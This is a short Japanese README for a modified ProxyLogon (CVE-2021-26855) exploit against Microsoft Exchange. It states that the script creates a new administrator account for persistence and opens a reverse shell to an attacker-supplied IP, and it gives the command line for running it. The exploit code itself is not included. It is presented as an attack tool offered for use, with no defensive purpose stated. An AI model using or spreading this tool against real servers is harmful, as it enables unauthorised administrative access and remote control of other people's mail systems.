
Microsoft Exchangeを標的としたCVE-2021-26855 (ProxyLogon) のエクスプロイト。新しい管理者ユーザーを作成し、ポストエクスプロイトアクセスのためのリバースシェルを確立する。
CVE-2021-26855
これは proxylogon の POC を改変したバージョンです。"whoami" を起動する代わりに、新しいユーザーを作成してそのユーザーを Administrators グループに追加し、リバースシェルを作成します。オリジナルの POC コードはこちら: https://www.exploit-db.com/exploits/49663
使用方法: python proxylogon.py <reverse_shell_ip>